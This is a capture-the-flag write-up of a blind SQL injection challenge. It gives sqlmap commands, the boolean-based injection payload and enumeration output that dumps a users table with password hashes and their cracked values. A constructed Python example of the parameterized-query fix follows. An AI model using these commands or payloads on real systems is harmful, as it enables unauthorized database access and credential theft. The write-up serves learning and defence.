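0x00 Challenge
Someone alerted H4x0r that his Web150 news site was vulnerable, so H4x0r hardened the site. You now need to find the password hash of the site's admin user to get the flag.
0x01 Solution
This challenge is similar to Web 150, except that the injection here is boolean-based blind, so we go straight to sqlmap: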
```
python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --threads 10
```
Output:
```
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3770=3770 AND 'wNSD'='wNSD
---
...
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: SQLite
```
Enumerate the tables:
```
python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --dbms=SQLite --technique B --threads 10 --tables
...
Database: SQLite_masterdb
[2 tables]
+-------+
| data  |
| users |
+-------+
```
Enumerate the columns of the users table:
```
python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --dbms=SQLite --technique B --threads 10 -T users --columns
...
Database: SQLite_masterdb
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | INTEGER |
| name     | TEXT    |
| password | TEXT    |
+----------+---------+
```
Dump the name and password columns to get the flag:
```
python sqlmap.py -u http://hack.bckdr.in/2013-WEB-500/submit.php --data id=1 -p id --dbms=SQLite --technique B --threads 10 -T users -C name,password --dump
...
Database: SQLite_masterdb
Table: users
[2 entries]
+----+-------+-----------------------------------------------+
| id | name  | password                                      |
+----+-------+-----------------------------------------------+
| 1  | john  | 1f3870be274f6c49b3e31a0c6728957f (apple)      |
| 2  | admin | 1d5920f4b44b27a802bd77c4f0536f5a (google.com) |
+----+-------+-----------------------------------------------+
```
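Why the boolean-based blind payload reported by sqlmap works, and the fix that removes it, as an added example (not code from the challenge or from sqlmap). It assumes the server concatenates the POST `id` into a quoted string, as the payload's quoting implies; the `data` columns, the sample row and all function names are constructed.

```python
import sqlite3

def make_db():
    # Constructed schema: the page reveals only the table names, so the
    # columns and the row in `data` are assumptions for illustration.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE data (id TEXT, title TEXT);
        INSERT INTO data VALUES ('1', 'constructed news item');
    """)
    return db

def lookup_vulnerable(db, news_id):
    # Hypothetical 'before': the POST value is pasted into the SQL text,
    # so quotes inside it change the structure of the WHERE clause.
    sql = "SELECT title FROM data WHERE id = '" + news_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, news_id):
    # Hardened form: the value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT title FROM data WHERE id = ?", (news_id,)
    ).fetchall()

def has_boolean_oracle(lookup, db):
    # Regression check: send the page's always-true payload and the same
    # payload with the comparison made false. If the two responses differ,
    # the input reached the SQL parser and the page acts as a yes/no oracle.
    true_probe = "1' AND 3770=3770 AND 'wNSD'='wNSD"
    false_probe = "1' AND 3770=3771 AND 'wNSD'='wNSD"
    return lookup(db, true_probe) != lookup(db, false_probe)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks a boolean:",
          has_boolean_oracle(lookup_vulnerable, db))
    print("parameterized lookup leaks a boolean:",
          has_boolean_oracle(lookup_parameterized, db))
    print("legitimate id still works:", lookup_parameterized(db, "1"))
```

With the bound parameter both probes are compared against the `id` column as literal strings and return the same empty result, so there is no true/false difference left to observe.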